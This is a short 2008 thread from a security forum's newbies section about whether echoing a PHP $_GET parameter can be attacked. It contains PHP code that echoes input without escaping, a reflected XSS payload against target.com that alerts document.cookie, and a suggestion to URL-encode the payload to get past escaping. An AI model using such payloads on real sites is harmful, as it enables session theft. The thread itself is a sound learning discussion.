|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 73
Members: 0
Total: 73
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
$_GET Hack |
|
Posted: Wed Jun 18, 2008 12:59 pm |
|
|
Xelion |
Regular user |
|
|
Joined: Jun 13, 2008 |
Posts: 15 |
|
|
|
|
|
|
|
Hi,
I would like to know if there is a possibility to hack from displaying a $_GET:
Code: |
<? PHP
echo $ _GET [ 'trick'];
?> |
|
|
|
|
|
Posted: Wed Jun 18, 2008 1:41 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Classical reflected XSS:
Code: |
http://target.com/index.php?trick=<script>alert(document.cookie);</script>
|
|
|
|
|
|
Posted: Wed Jun 18, 2008 6:14 pm |
|
|
Xelion |
Regular user |
|
|
Joined: Jun 13, 2008 |
Posts: 15 |
|
|
|
|
|
|
|
Thank's
The code is :
Code: | <? if (isset($_GET['trick']))
echo '<span class="trick">'.$_GET['trick'].'</span><br/>';
?> |
But if I do :
Code: | http://target.com/index.php?trick<script>alert(document.cookie);</script> |
The code is :
Code: | <span class="trick"><script>alert(document.cookie);</script></span><br /> |
|
|
|
|
|
Posted: Thu Jun 19, 2008 12:47 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Are you sure that is what the code is? Because of that behavior i think it's:
<? if (isset($_GET['trick']))
echo '<span class="trick">'.htmlspecialchars($_GET['trick']).'</span><br/>';
?>
you can only try url encode the "<script>alert(document.cookie);</script>" first but i doubt that will work. |
|
|
|
|
Posted: Thu Jun 19, 2008 10:21 am |
|
|
Xelion |
Regular user |
|
|
Joined: Jun 13, 2008 |
Posts: 15 |
|
|
|
|
|
|
|
Yes I'm sure
Otherwise I try to trust someone who send a PHP script to find a loophole =) |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|